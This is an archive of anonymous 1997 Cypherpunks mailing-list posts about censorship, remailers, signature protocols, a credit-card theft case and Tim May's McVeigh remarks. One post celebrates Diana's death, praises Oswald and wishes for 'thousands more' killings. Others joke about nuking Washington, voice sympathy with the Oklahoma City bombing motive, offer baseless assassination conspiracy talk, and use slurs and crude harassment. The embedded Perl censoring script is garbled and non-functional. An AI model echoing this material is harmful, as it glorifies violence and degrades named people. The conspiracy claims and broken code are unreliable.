@_author: Anonymous 
@_subject: U.S. Refugees Flee to Germany 
~"Whether it's CPAC wanting to nuke all web sites containing the word 'boy,' Senator Swinestein wanting to nuke all web sites containing the word 'bomb,' or Senator Hatch wanting to nuke all web sites containing the word 'sex,'" writes Mike Duvos in a Cypherpunks newsgroup, "the optimal strategy for service providers has turned out to be to quietly remove any material some squeaky wheel is uncomfortable with, keep proclaiming themselves to be the strongest supporters of free speech in the entire Net community, and stonewall when asked questions which might suggest anything to the contrary."   Sounds like one of them-thar, cynical, irreverent, shit-disturbing
CypherPunks, to me.
~Now, the pages are back online on a small server in Germany. Organizers of the site are raising funds to purchase their own direct connection to the Net. However they don't want their computer to be in the US-- but not because they plan to violate any US laws. "We are very nervous
about being here," says Jim Finn, who helps run the Free Spirits, "if the government is going to use underhanded tactics to intimidate our providers and possibly confiscate our equipment." In the course of investigations, police frequently seize computers that they never return, even when they file no charges.   Perhaps Germany should start building refugee camps for American
homosexuals, Jews, and producers of strong encryption.
~If the Internet had sprung up in the 50s, Senator Jesse Helms would be riling his white constituents about the scandalous web sites promoting interracial marriage and civil rights. The right way to answer to Helms and his ilk is not with pacifying assurances that, thanks to filtering, people can avoid these offensive ideas, but to confront the underlying racism. Now that queer sex is the bugaboo, the answer shouldn't be any different.   CypherPunk Cult of One Project:?:
  Put up a website containing quotes from Jesse Helms and other high-
profile politicians, public figures, etc., and then actively promote
it being censored and removed from the InterNet.
  (Pictures of a topless Princess Di, etc. Naked children from a "Life"
   magazine photo from the '60's, etc.)
  Has anyone ever sued themselves to have their own site censored and
  "Greg Broiles vs. Greg Broiles" (Kind of has a 'ring' to it.)
~That censorship is bad and dangerous no matter who its victims is a concept best grasped today by Cypherpunks steeped in computers and the Net.   And who came out of internment in the legendary "Flame Camps"
of the late 1990's, vowing, "Never Forgive. No Prisoners."
~Whether it's the painting "Mona Lisa" or the sex video Lisa Moaning,   WHY DON'T THESE PEOPLE PROVIDE *POINTERS*!!!
  (No, *not* to the "Mona Lisa," you idiot!)
~If hysteria over drugs or hate speech or pornography becomes intense enough, then no one's data-- which is to say no one's privacy-- is safe. Much better than civil libertarians and gay politicos, Internet activists have seen the danger in the new wave of repressive laws. Whether they can articulate that danger to a broader public remains to be seen. If not, the 1990s may be recalled as a short-lived golden age of free expression on the Net, and free spirits won't have any place to call home. **   "Give me bandwidth, or give me death."
  "Give me your huddled electrons, struggling to be free."
  "Now is the time for all good hackers to come to the aide of
  "One if by land. Two if by sea. NULL if by Net."
  ("The Americans are coming! The Americans are coming!)
  "I may not agree with what you censor, but I will defend to the death
  my right to tell you to 'Fuck off and die.'"
  "Ask not what you can do for your country. Ask where the Federal   building is."
  "A small step for a nuclear bomb. A big step for D.C."
  ("It's raining donkeys and elephants out there. Better take
   your lead umbrella.")
  "In Diffie-Hellman We Trust."
  "Nuke the candidate of your choice--but Nuke!"
  "The final finding of the TruthMonger Commission is that Tim May acted
  alone. The Magic Nuclear Missle hit D.C., deflected toward Moscow,
  turned around in mid-air and took out London, before coming to rest
  at Rome.
  "There is no evidence to suggest that Jim Bell was ever a member of
  the CypherPunks list, or ever had contact of any nature with Tim May.
  Toad.com was never connected to the CypherPunks list--it served mostly
  as a mail-drop for decent, upstanding drug dealers, pedophiles, tax
  evaders and terrorists.
  "Duncan Frissel's first act of power, the pardoning of Tim May, was   done in order to allow the nation to put this behind us and to heal   our nuclear wounds."
  CONSTITUTION OF THE UNITED ISP'S OF TERRA
  -----------------------------------------
  "Congress shall make no laws."
  Signature:   Anonymous        Witness: Nobody
               ---------                 ------
  Send complaints of abuse of this Constitution to: Lock&Load at nuke.dc

@_date: 1997-08-30 00:53:32
@_author: Anonymous 
@_subject: Stealth Helicopters 
Or very quiet private jets. I saw a small, unmarked jet plane
tailing and tracking an urban police helicopter just the other
night while out on a walk in a deserted commercial district.
Its light signature resembled Vader's Imperial Shuttle, incidentally.
-THE LIE

@_date: 1997-08-31 14:04:49
@_author: Anonymous 
@_subject: No Subject 
Received this yesterday.  Out of curiousity, anyone
know where (810) area code is located?

@_date: 1997-08-31 20:30:16
@_author: Anonymous 
@_subject: None 
This wouldn't be a signal that the French event instigated by the
Masons has been completed, could it?

@_date: 1997-08-31 20:30:37
@_author: Anonymous 
@_subject: Princes Die! / Re: None 
This couldn't mean that the attack at dawn is done, could it?

@_date: 1997-08-31 20:47:03
@_author: Anonymous 
@_subject: Confirmation on Diana, please? 
Loose-cannon Diana became dead Saint Diana ala J.F.K.
 "What a wonderful person she is, now that she's gone."
 Why do the nefarious, omniprescent 'they' (TM) always announce the
death by heart attack so many hours after rushing the target to the
hospital? Does it have to do with airline schedules?
 Any reports of a second driver on the grassy knoll?
 Any guesses as to when the crash surviver bites it?

@_date: 1997-08-31 21:24:40
@_author: Anonymous 
@_subject: Confirmation on Diana, please? 
Fuck Diana and Dodi, rotting garbage, germs,
well ridded, like JFK. Up the paparazzi or whoever honored Labor Day
doing dirty work, giving a lesson: run, can't hide.
Two down, thousands more to go worldwide, the sooner the better, inshallah, scare the beasts back
to bunker. Guards will drain their blood, day by day.
Grieve for the driver, maybe the royal bitch's cop,
praise Oswald or whoever.

@_date: 1997-09-01 09:27:57
@_author: Anonymous 
@_subject: "Smack" the lawyer of your choice...but smack! 
GEORGE D. HARDY
Assistant U.S. Attorney
     4.   I  have  been  advised  by  the  Federal  Bureau  of
Investigation that the public release of the identity of the two
victims could cause serious financial and security difficulties for
the victims.  Until now, the victims have been identified only to
the defense, as part of the criminal discovery in the case.
  Silly me, I thought the people who had their credit card information
exposed were the victims.
     5.   The  difficulties  facing  these  victims  include  the
probability that additional hackers will seek to challenge these
computer systems,  once the defendant's successful efforts are
revealed; and the loss of business due to the perception by others
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
that computer systems may be vulnerable.
  Uh... Excuse me, Dude, but I believe that's how life works. Unless,
of course, the government steps in to cover up the facts to the benefit
of rich corporations and to the detriment of their gullible customers.
     8.   The defendant's counsel was contacted regarding this
motion.  She expressed a willingness to agree to it, but only if
the  government  agreed to  limit  in some way the  government's
appropriate public release of the defendant's guilty pleas as a
deterrent to others.   Such an arrangement was not acceptable to
the government.  Defendant's counsel therefore indicated that she
would like to file an opposition to this motion; but would agree
that pending the resolution of this issue, that the identities of
the victims could be protected.
  The cunt sold her client down the river for a good tee time with
the prosecutor at a private golf course. Put her in charge of
defending Terry McNicols.
"Smak" delivered an encrypted CD containing over 100,000 stolen credit card numbers. After the validity of the credit card information
was confirmed through decryption of the data on the CD, "Smak" was taken into custody by the FBI.   And the 100,000 people were immediately notified that their credit
cards had been compromised? I fucking doubt it. Better to screw over
100,000 citizen-units than expose the incompetence of a few companies
and the government's fight against strong encryption and computer

@_date: 1997-12-01 22:57:46
@_author: Anonymous 
@_subject: No Subject 
-----BEGIN PGP SIGNED MESSAGE-----
Sender: Amad3us Robert Costner says:
The purpose of a remailer is to allow the sender to be anonymous, so
it strips real headers to prevent accidents (eg. subject fields
organization etc).
Then it has to allow you to put headers back in otherwise you can't
interoperate with software.  Eg pasting in References:, Subject: (I
would like to see Cc: and Bcc: being allowed to be pasted in also).
I would also like to see From: pasted in.  In fact I can see no
purpose to restrict what can be pasted in, other than to reduce
complaints to the remailer operator possibly.
It's easy enough to allow From:.  I do it myself sometimes, and notice
Nerthus does also, pasting in From fields works at least with Replay
as the exit node, but that results in two From fields.
My software shows be all headers.  I am not sure what other software
would do, probably, only display the first From field (the remailers).
I would have thought remailers are not actually trying to advertise
their From fields.  Perhaps allowing bogus From fields, or even
putting in remailer at dev.null if there is not a From field would
greatly reduce complaints from clueless users.
If you want to you can always put in Sender: remailer at anon.efga.org.
That'd do.
However you'll notice that my address is:
Amad3us which means that I would like it to be pasted in as it is replyable
(for encrypted mail) even though not being a nymserver account.
Not sure that the assurance is this strong.  However the feature would
be useful.

@_date: 1997-12-02 00:39:20
@_author: Anonymous 
@_subject: Freemen and Serfs 
How, exactly?  We're not talking about computers as "the technology".
We mean anonymous remailers, digital cash, Chaumian credentials,
steganography, and other cypherpunk technologies.  Who is using these
technologies to make more money today?  Almost no one.  The reason is
that the market is far too small.  You can't put together a business
plan and attract the investment needed if there are only a few hundred
cypherpunks as customers.
Totally different.  The point is not to trade, it is to do so anonymously
and confidentially.  You yourself are always whining about how you can't
buy and sell your stocks privately, all your financial status being
known to the state.  Cypherpunk technologies are useless unless all
parties to a transaction are using them.  If even one party is subject
to government or criminal surveillance then other participants will be
forced to report the transaction as well.
The only hope for these technologies is to spread the base of people using
them.  It doesn't do any good to use anonymous ecash if no one will accept
it for payment.  You can't make a living as a nym until there are enough
people using these technologies that a business can succeed via anonymous
contracting.  It all depends on getting a critical mass of users.

@_date: 1997-12-02 02:35:08
@_author: Anonymous 
@_subject: Is Tim May guilty of illegally advocating revolution? 
You've both forgotton the fourth leg of the tripod, the one where Tim May
calls for the governor of Florida to be shot (along with other officials).
Governor Chiles' capital crime?  He refused to allow California wine to
Everyone likes to overlook this, pretending that May didn't mean it.  Well,
he never withdrew it, did he?  He never apologized for it.  He's on the
record as explicitly calling for the murder of high officials.
And of course May further revealed his true colors with this horror,
from the same message:
May's apologists have tried to pretend that he didn't say this, that he
said that he was beginning to understand McVeigh, or something.  That's
not what he says here.  He says he is becoming convinced that McVeigh
did the right thing in murdering all those people.
He callously compares the shattered bodies of the children and other
innocent victims to broken eggshells.  Monty Cantsin has provided us
a moving description of the painful deaths of the children in Waco.
Will dying of asphyxiation under pressure too great even to draw a breath
be any easier?
Again, you will search the archives in vain to find any apology for this,
any withdrawal.  May hides behind the words of others, as he does above,
hoping that their softened interpretations will make people forget the
plain facts about what he wrote.
If Tim May does not agree with the quotes above, let him say so now.

@_date: 1997-12-02 07:17:27
@_author: Anonymous 
@_subject: Is Tim May guilty of illegally advocating revolution? 
There's a fallacy which is quite common on this list, especially among
members whose positions are otherwise indefensible.  It's surprising in
a way because this fallacy is more common among statists.
There, the fallacy goes like this: if it is immoral, then it must be
illegal.  We see this all the time.  People think of the government as
their way of expressing moral values.  Drugs are wrong, so they must be
made illegal.  Discrimination in employment is wrong, so it also must
be illegal.  We have countless bad laws based on this false premise.
On this list we see the same fallacy, turned around: if it is legal, it
must be moral.  Someone is attacked for posting some vicious, hateful,
immoral rant, and they respond that what they said was legal, because of
freedom of speech and the First Amendment.  Their critic must be opposed
to free speech if he objects to their words.
Confusing what is legal and what is moral is a dangerous game.  It leads
to the false reasoning of the statists.  We must remember that there is
a clear distinction between morality and legality.
We all agree with freedom of speech.  People should be able to say
whatever they like without fear of legal consequences.  Cypherpunk
technologies can play a major part in assuring this freedom.
But this does not mean that all speech is equally valid.  If someone
calls for murder and they are attacked for it, it does no good for them to
hide behind the First Amendment.  Their words are wrong - they will have
harmful consequences if followed.  They cheapen life, and work against
the goals we share of a future based on cooperation rather than cooercion.
Cypherpunks are intelligent enough not to be fooled by this attempt
to use the principle of free speech to justify calls for violence and
It's no wonder, really, that people like May and Vulis attempt to confuse
the issue by pretending that their critics are opposed to freedom of
speech.  They know that if they are judged by their own words, their
character is revealed for all to see.  Any smokescreen is welcome if it
helps conceal their vicious, hateful nature.

@_date: 1997-12-02 13:02:43
@_author: Anonymous 
@_subject: Kashpureff stuff online 
Anyone know of any low S/N lists out there for "Crackerpunks"??

@_date: 1997-12-02 19:13:47
@_author: Anonymous 
@_subject: RSA 
Tim C[retin] May studied yoga back-streching exercises for five years so he could blow himself (nobody else will).
     (((>     /<
    (        /
     ((({{{{{:<  Tim C[retin] May
             \
              \<

@_date: 1997-12-03 04:55:49
@_author: Anonymous 
@_subject: Pasting in From: 
gburnore+NOspam at netcom.com (Gary L. Burnore)
PGP signing a post is a lot like the new anti-counterfeiting measures in US
currency, only a lot more effective.  But if some bozo decides to start printing
up three dollar bills with a portrait of Mickey Mouse, and others are
foolish enough to accept them, what are you going to do?  It's hard to protect
people from their own stupidity.  I'd contend that a $3 bill isn't even a
counterfeit or forgery, since there is not genuine equivalent which it seeks to
fraudulently duplicate.
Maybe it's time that the brain-dead software that mindlessly harvests e-mail
addresses from the net was shut down.  That sounds like the real problem.
I'm not sure what comment you intended to make about that paragraph, since it
appears that you inadvertantly pasted in your comment from the last paragraph
again.  The text you're supposedly commenting on nowhere mentions PGP.
Since you've already found a solution to the problem that works, there seems
to be no need to do anything more drastic to solve it.
For one thing, to identify posts as originating from one's pseudonym, which *MIGHT* be a "real" e-mail address.  Most times I've seen it used, though, it has been used to place identifying information in the From: field which many newsreaders use to identify posts so that they are recognizeable by the reader.
The key word there is "caught", and then you'd have to convince Netcom to actually
do something about it.  It is my understanding that spammers routinely utilize
Netcom's OPEN SMTP SERVERS to send out their spam, using whatever From: field they
wish, and Netcom doesn't seem to care.  Anyone using those same servers to send mail to a mail2news gateway could forge someone's name and e-mail address to a Usenet post, couldn't they?
Also, even if a complaint to Netcom got an individual account shut down, that wouldn't
stop some other Netcom user from doing the same thing, nor would it stop the first
Netcom user from opening another account under a phony name and repeating the
process, or even doing it from a non-Netcom account.  So if my e-mail address were
being forged via Netcom, would they be able to source-block it as the remailers
currently can do?  If not, doesn't your own ISP have a bigger abuse potential than the
remailer net?
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
There's no need to shout.  Perhaps you've forgotten two earlier posts you made to
this NG in the past couple of weeks in which you said:
-> Subject: Re: Controlling the From: line in PIdaho
-> -> Hopefully replay has corrected this as others have suggested so that the above
-> CAN'T be done.  It's a simple way to forge someone else's name.  Early last
                                        ^^^^^
-> year comes to mind.
-> [...]
->      -> Posting anonymously is a valid thing to do, posting with someone else's name
-> in the From line is simply forgery.   Try sending your message from a hotmail
                              ^^^^^^^
-> address or other site where you can just make up a name if you want this sort
-> of thing.
And in another post:
-> Subject: Re: 'from' other than anonymous
-> -> [...]
-> -> Again, a forged from line (Forged as in someone's _REAL_ email address shows
            ^^^^^^            ^^^^^^
-> up) is a BAD THING.
You claimed to be concerned about FORGERY back then, now you're saying "IT'S NOT FORGERY THAT'S A PROBLEM".  Which is the case?
But you were given two solutions, so if one of them works, then you don't need the
other one.

@_date: 1997-12-03 08:35:16
@_author: Anonymous 
@_subject: Minsky skeptical of privacy 
Sore nerve in a glass house, eh?  Charming Minsky still does a
Denning.  Trillion dollar pork barrel: some gives, some takes.  Not
both.  Every rat pulls the lever, gets the pellet.
Monty Cantsin
Editor in Chief
Smile Magazine
-40B 40B

@_date: 1997-12-03 08:44:09
@_author: Anonymous 
@_subject: Cantsin Protocol No. 2 
Your suggestions were very helpful.  Thank you for making them!
I'm calling the latest version "Cantsin Protocol No.2" and its
identifying number is "25BA1A9F5B9010DD8C752EDE887E9AF3".
It is similar to Cantsin Protocol No. 1, but the bug with the hash of
the public key is fixed.  Instead of concatenating the values p, g,
and y, you concatenate "p: g: y:" and compute the hash.  p,
g, and y should be represented as ASCII hexadecimal digits without
leading 0s.
The hashes should now be correct SHA1 hashes.
My thinking on this is that passes are cheap these days.  I want the
signature to be unobtrusive which probably can't be done if only one
pass is required.
Incidentally, a nice feature of these signatures is that they can be
moved around in the file just by changing the offset.  You don't need
to control the secret key to do it.
The signature checker should ignore bad or incomplete signatures.  I
would consider this to be a bug in the software and not a bug in the
protocol.  A bad signature simply lacks meaning and an error message
need not be reported.
That might seem a little callous, but actually it's how we should
regard signatures.  The current model seems to be "computer, check the
signature on this file and tell me if it's good", whereas the correct
(in my view) model is, "computer, extract all of the material from
this file which is properly signed and throw out the rest."
(Of course, you could imagine a smart editor which highlighted the
areas of a document which were signed by various parties.  It seems a
little early to implement this.)
If it's not authenticated, you shouldn't even look at it.  I've taken
to putting the To: and Subject: header lines at the bottom of my
messages for this purpose.  There's really no need to keep any of the
header fields.
The header fields can be put at the end just as unambiguously as at
the beginning, but at the end they can be signed.
Strictly speaking it's there to save space.  If we put the public key
components in every signature it wouldn't be much harder for the key
management software to compute a hash on them somehow.  This does not
have to be standardized.
ACK!  I knew about this problem, but I couldn't remember exactly how
it worked.  So I said, "Monty, let's not be dumb like those PGP guys.
Let's concatenate the keys together and compute the hash.  Nobody will
Thank you very much for pointing this out.
People who want this feature should type something like "BEGIN CANTSIN
PROTOCOL NO. 2" and "END CANTSIN PROTOCOL NO. 2" into the text at the
right points.
My feeling on this is that this is outside the scope of a signature
protocol.  The protocol should not make any assumptions about what is
being signed nor should it modify what is being signed.
I use LF to terminate lines and would recommend this to others, but it
is not part of the Cantsin Protocol No. 2 specification.
In any event, if we must put in patches to handle the poor fidelity of
electronic mail, the patches should go in afterwards.  When a
signature checking program finds ">From" it should replace it with
"From" and see if it can get the right checksum.  Likewise, it should
try the various line endings until it gets a match.  There can't be
more than about 12 variants, so this shouldn't create an onerous
burden on the machine.  (And, I suppose, it would be possible to add a
field after the length or after the hash which made a suggestion about
the line ending.)
Another great suggestion.  The hashes should be correct now.
Incidentally, in another thread I've been talking about partial
signatures.  The code above is an example of where this would be
useful.  In some countries we are not allowed to express ourselves
freely without persecution.  If I wanted to provably quote somebody
who included forbidden ideas in their message, it wouldn't be possible
without partial signatures.
This might be a good thing to add to a later Cantsin Protocol.
Schneier doesn't mention this, although presumably this information
will show up in one of his references.  Do you know offhand of a
published source which covers this?
This is just intuition, isn't it?  Since we really don't know how hard
it is to factor it seems hard to claim we know the ratio of difficulty
between breaking SHA1 and El Gamal.  Factoring could be broken before
Not that any great science was applied to the choice of a 2048 bit
prime, it just seemed like a good size.  ;-)
Also, I think it is a mistake for people to communicate the strength
of a system by choosing various key lengths based on general popular
views.  It's probably better to say "I estimate this system requires
at least 2^x operations to break."
We've seen this with people choosing short keys so nobody will get the
idea that it is secure.  This just seems all wrong to me.  The key
length is only one way in which a key could be insecure.  Monty
Cantsin's authentication key, for example, is not kept very securely.
But, the way to communicate that is to say "this key is not kept all
that securely."
However, in Cantsin Protocol No. 2 the size of the prime chosen is
completely unspecified.  There doesn't seem to be a reason to restrict
the choice other people will make regarding the length of the prime.
I could imagine choosing a short key for control over a
semi-persistent identity.  The advantage is that you can claim
somebody else brute forced the key for statements you wish to
repudiate.  Similarly, I could imagine choosing an obnoxiously long
key to make it hard for people who don't have super fast machines to
associate with you.
Monty Cantsin
Editor in Chief
Smile Magazine
-2B49 2B49

@_date: 1997-12-03 09:40:47
@_author: Anonymous 
@_subject: Freemen and Serfs 
If elitism had been intended, the subject would have been "Lords and
Serfs".  Freemen are more like people with some rights, some property,
and some skills, but who are not serfs.
Cypherpunks should be able to provide services which slavers and
others want.  This could be code.  It could be expertise.  It could be
connections.  Whatever.  The slavers have things to offer cypherpunks,
whether it's food, construction work, hardware, etc.
Whatever the medium used to trade these services, there is no reason
why the slavers would forego the services they may want.  Assuming
that the Freemen aren't agitating on behalf of the slaves, that is.
We don't need all the slavers to deal, nor do all cypherpunks have to
deal with all slavers.  Just some members of both groups need to get
together and trade.
Standard doctrine, but I no longer believe it is sound.  We've been at
it for years now.  Are the masses using crypto?  I didn't think so.
It's a waste of time to sell to people who think they "have nothing to
hide".  Even if they were using crypto, they would accept snoopware if
it were accompanied with the right media programming.
Which means that instead of proselytizing, it's probably better to
develop systems which we can use which are expensive-to-impossible to
thwart even in hostile environments.
There's no need to turn people away, of course, but begging people to
help themselves is a poor investment.
Monty Cantsin
Editor in Chief
Smile Magazine
-9E1 9E1

@_date: 1997-12-03 10:05:26
@_author: Anonymous 
@_subject: Is Tim May guilty of illegally advocating revolution? 
A ghost speaking through the medium replay.com communicated:
Whether we like it or not, many people are sympathetic with McVeigh.
Some are considering whether actions like bombing Federal buildings
are justified.
It's far far better that these issues are raised and discussed.
You've hit upon something interesting here, Anonymous.  Let's consider
three groups of children.
1. ~100,000 children harmed in Iraq.
2. ~40 children harmed in Oklahoma City.
3. ~20 children harmed outside Waco.
Of these three groups, the third upsets me the most.  Why?  There are
several factors.
One is the extent to which the people committing the actions claim to
represent me.  It is often claimed and widely believed that the
Federal government is acting as a representative for and is answerable
to the American people.  (Allow Monty Cantsin a hollow laugh here.)
That being the case, Waco is far more upsetting than Oklahoma City in
this regard because McVeigh (or whomever) is not thought to represent
a sizeable proportion of the American public.  In the case of Iraq,
this factor raises my concern well above other places in the world
where children are mistreated.
Of the three groups of victims, I identify most strongly with the
people in Waco.  While not strongly religious myself, I respect people
who have unusual beliefs and stick to them.  And I have sympathy for
those who might live in unusual ways.  While I share a culture with
the victims in Oklahoma City, in general we would have little to say
to each other.  I don't know anything about people in Iraq.  This
factor probably governs my feelings on the matter most strongly.
The motivations of the people committing the acts are important.  I do
not believe that McVeigh (accepting the standard paradigm) meant to
kill children.  He certainly meant to kill people who had no
involvement with Waco.  I do not approve of his choice.  I would maybe
even kill somebody to prevent it from happening.  But, one feels
differently when children die more or less by accident than when it is
cold bloodedly premeditated.
In the case of Iraq, it is extremely hard to justify killing kids for
their oil.
The provocation that leads to an act must also be considered.  I am
extremely sympathetic with McVeigh's desire to do something about
Waco, even though I do things less violent and (hopefully) more
effective.  There was no reason whatsoever for the Waco crime to be
committed, likewise people living in the Middle East have not really
committed any provocative act more serious than having oil on their
The mob mentality that seems to have gripped the United States during
the Waco atrocity has a particular horror which is absent in the case
of Oklahoma City and, right now anyway, mostly absent with Iraq.  The
blatant misrepresentation of what was occurring and the degree to
which people were compliant with it is shocking.  There was no serious
attempt to investigate the motivation behind the raid, or even what
was actually occurring from day to day.
The aftermath was even more horrifying.  The government attacks and
murders ~80 innocent people in the most brutal way for no identifiable
reason.  And all anybody can seem to do is to try to protect the
establishment, instead of finding out exactly what happened, instead
of charging the criminals who perpetrated the horror, instead of
taking the necessary actions to make sure nothing like this will ever
be done again by the Federal government, and instead of telling the
The implications of the three situations create varying degrees of
alarm.  I do not expect to see many more bombings.  Bombs are nothing
new.  They've been around for over 100 years and they are a manageable
problem.  Every few decades there's been a big explosion.  It is
unlikely McVeigh will do something like this again.
In the case of Iraq, I'm used to governments behaving this way and I
do not see it directly affecting me very soon.  (Perhaps this is a bit
Waco, however, is quite another matter.  When you watch the footage it
gives you the creeps because what is being reported belongs in the
1940s and the people should be speaking German.  Instead, everybody
speaks English with an American accent and it's happening right now.
When you see an FBI agent justify what happened on the grounds that he
goes to a "normal" church and has a "normal" family, and when you see
other officials state that they wanted to harm the children to
encourage the parents to turn themselves in, the implications are that
we have a very serious problem that will not go away by itself.
Finally, in the case of Waco, the people in charge had all the time in
the world to think very carefully about what they were doing.  They
apparently decided to kill everybody they could, including particular
children whose names they knew, whose pictures they had seen, and some
of whom they may have even spoken to on the telephone.  This really is
hard for me to understand.  I can't imagine what kind of person can do
something like this.
This horror is particular to Waco.  In the case of McVeigh and the
people making policy regarding Iraq, the victims are at least
Monty Cantsin
Editor in Chief
Smile Magazine
-193C 193C

@_date: 1997-12-03 11:02:46
@_author: Anonymous 
@_subject: Pasting in From: 
My guess is it has brought in very little money.  There is really no
reason to use it.  It seems to be the same as the jam remailer which
is free.  I had hoped to use it as an exit remailer, but even that is
a loss as it apparently uses cracker (?) for that purpose.
What we did learn is that it isn't that hard to set up a remailer to
accept ecash.  I doubt we've learned much about the market potential.
The recent reports of the anonymizer pulling in $180,000 annually are
worth thinking about.
This is a good idea.  Ecash accepting remailers should offer perks
which are not generally available, or just offer a faster more
reliable service to paying customers.  For example, free messages are
delayed 90 minutes while paid messages are sent immediately, modulo
some details like mixing.
Monty Cantsin
Editor in Chief
Smile Magazine
-5C3 5C3

@_date: 1997-12-03 14:40:11
@_author: Anonymous 
@_subject: Is Tim May guilty of illegally advocating revolution? 
A ghost speaking through the medium of replay.com communicated:
This is a good thing to remember.  However, what you seem to be
calling immoral is holding a belief with which you disagree.
Is it possible to hold an immoral belief?  I don't think so.  Once
you've drawn a conclusion about the nature of the world you can hardly
decide that it would be immoral to understand the truth.  Actions, on
the other hand, can be immoral.  Let's not confuse beliefs with
What you seem to be proposing is that Tim May (or whoever) should
refrain from expressing certain of their beliefs about the world
because they are immoral.  You have seldom addressed Tim's statements
directly.  Orwell had a word for this: "crimestop".
Monty Cantsin
Editor in Chief
Smile Magazine
-812 812

@_date: 1997-12-03 15:12:57
@_author: Anonymous 
@_subject: The Eye Bank 
I can see the advertising campaign now: "Bank at Big Brother Bank, NA
- have your eyes ripped out!"
The device probably has trouble distinguishing between a mannikin with
some real eyes and a real person.  Conveniently for the robbers, the
victim will be unable to identify anybody later.
The plausibility of this threat model has a lot to do with whose eyes
we're talking about.  If they're your eyes, be my guest.  It's
probably safe. ;-)
This is just one of the many risks of deployment of these
technologies, but it's the one that makes even the most docile sheep
pay attention.
Consider the child implant issue.  "You have nothing to worry about
because your child's Protect-A-Life implant can only be removed with
surgery!"  The problem is, that's exactly how it will be removed.
Monty Cantsin
Editor in Chief
Smile Magazine
-5A1 5A1

@_date: 1997-12-03 20:15:13
@_author: Anonymous 
@_subject: RICE v PALADIN ENTERPRISES 
This claim is demonstrably absurd.  There are roughly 26,000 murders a
year in the United States each year.  The number of contract killings
is probably a good deal less than 10% of this which leaves 2600.
Let's be generous to the Court and say 10% of these murders are
committed by people who read the book.  (This can probably be shown to
be entirely false by comparing suspected contract murder rates before
and after publication of the work.) If we treat the Court with extreme
charity we will say that each contract killer reading the book has
only killed one person.  Total: 260 killers read the book.
Presumably many more copies of the book were sold and will be sold.
The only conclusion that can be drawn is that most of the people
purchasing the book did so for reasons of morbid curiosity.  This
should not be very surprising.
It appears that the judges in this case allowed their eagerness to
punish Paladin get in the way of their duties, the law, and common
sense.  This decision should be overturned.  The judges should be
Monty Cantsin
Editor in Chief
Smile Magazine
-63F 63F

@_date: 1997-12-04 08:19:38
@_author: Anonymous 
@_subject: Censorship 
There are two pieces of code included in this message.  Or, at least,
there would be if I were allowed to express my ideas.  Accordingly,
the first piece of code has been carefully censored.
The second piece of code is a Perl script which does the censoring.
The model is that of a tape which the censor lays across anything
The Perl script has -C and -Perl modes which try to preserve comments.
(They can be fooled, so you should look over the results before
distributing.)  You can also specify the string which is "printed" on
the tape.
The idea is that every time I write a piece of code which I cannot
distribute freely, a censored version will be mailed to appropriate
newsgroups, mailing lists, newspapers, and politicians.
This should have the effect of continually raising and dramatizing the
issue, as well as demonstrating repeatedly how ridiculous it is.
I would hope that some decades into the future we will be able to look
through the archives for these scraps of censored code and find it
 -w
require 5;
use strict;
$main::censor_string = "CENSORED BY THE UNITED STATES GOVERNMENT ";
$main::next_censor_char = 0;
$main::c_mode = 0;
$main::Perl_mode = 0;
sub main {
    my($switch);
    while( $switch = shift( ) {
    }
     = split(//, $main::censor_string);
    while(<>) {
            print "$_\n";
        }
            my($censored) = get_censor_chars(length($2));
            print "$1$censored$3\n";
    }
sub get_censor_chars {
    my($length) = shift;
    my($i);
    my(
    for( $i=0; $i < $length; $i++ ) {
    }
    my($censored_string) = join('',     return $censored_string;
Monty Cantsin
Editor in Chief
Smile Magazine
-22DE 22DE

@_date: 1997-12-05 03:48:33
@_author: Anonymous 
@_subject: Anonymous Threads 
Something that I have found irritating about the posts by
non-persistent identities is that it isn't possible to support a
meaningful discussion as previous statements can always be repudiated,
or maybe even weren't made by the particular poster.  I compared this
to sound bites.
On second thought, however, there is an easy way to solve this.  If
the anonymous poster accepts the context of previous messages, the
discussion can continue.  There's no reason why the person behind the
virtual thread has to be the same, but the context itself is important
if we want to have interesting discussions.
So, if you don't want to sign your messages, just acknowledge the
message ID of the relevant previous messages whose context you wish to
Monty Cantsin
Editor in Chief
Smile Magazine
-3AA 3AA

@_date: 1997-12-05 04:10:34
@_author: Anonymous 
@_subject: words have value, for good or ill 
It looks like we lost some context across the Atlantic.
In the United States when we are discussing free speech there are
usually some common assumptions that are used to simplify the
discussion.  Usually when free speech is being discussed, we do not
mean contracts, coercive threats, or copyrighted works.  Strictly
speaking, of course, those are speech, but that usually isn't what is
meant over here. (1)
The speech I am talking about is the kind of things which Tim May has
been writing.  To keep things simple, let's consider the statement
"McVeigh did the right thing."  It is not a contract.  It is not a
threat.  It is not copyrighted.
It is simply a belief which Tim May considered and posted to the list.
I think we've fairly settled that it is not immoral to have this
thought.  So the question really is, if you have such a thought, is it
immoral to express it?
It's hard for me to see how.  If the belief is correct, then other
people certainly will benefit from hearing it.  If the belief is not
correct, then other people may be able to enlighten you.  In either
case, it is preferable that the belief be expressed.
I'm not sure I understand what you are proposing.  My dictionary defines
"eradicate" in two ways:
1. to destroy utterly
2. to erase or remove
I don't believe the meme should be "destroyed" and I'm not sure I'm
comfortable with the means that would be required to do this.  Nor do
I see it as desirable to erase or remove posts which have already been
made, if it were even possible.
If you don't like somebody's ideas, I would suggest that you don't
read their messages.  If you don't want to see a particular idea,
perhaps you could hire somebody to remove the posts from your mail
queue that contain it.  If you don't like other people hearing certain
ideas, I recommend you get used to it.
(1) It is interesting to consider a world in which these exceptions
are not made.
If there were no coercive enforcement mechanisms for contracts, then
this exception would not have to exist.  The idea of doing business
solely on the basis of reputation is not only fascinating, but not
very unlike much of the world today.
There are two ways in which threats can be no ops.  One is if the
person being threatened is just a public key whose identity is simply
unknown.  A threat in that case is irrelevant.  The second is if the
person being threatened can adequately protect him or herself in which
case the threat is dangerous to the threatener.
And "intellectual property" is somewhat peculiar and implies a
centralized enforcement mechanism.  If we are to have "intellectual
property" in a worldwide networked environment, it implies a de facto
world government.  The alternative may be preferable.
Monty Cantsin
Editor in Chief
Smile Magazine
-E5C E5C

@_date: 1997-12-05 04:13:13
@_author: Anonymous 
@_subject: No Subject 
Does anyone know of any banks that provide
full internet banking services outside of the USA's banking regulations?

@_date: 1997-12-05 04:18:07
@_author: Anonymous 
@_subject: No Subject 
Does anyone know of any banks that provide
full internet banking services outside of the USA's banking regulations?

@_date: 1997-12-05 04:55:47
@_author: Anonymous 
@_subject: Christmas Ornaments 
-----BEGIN CHEAP SHOT-----
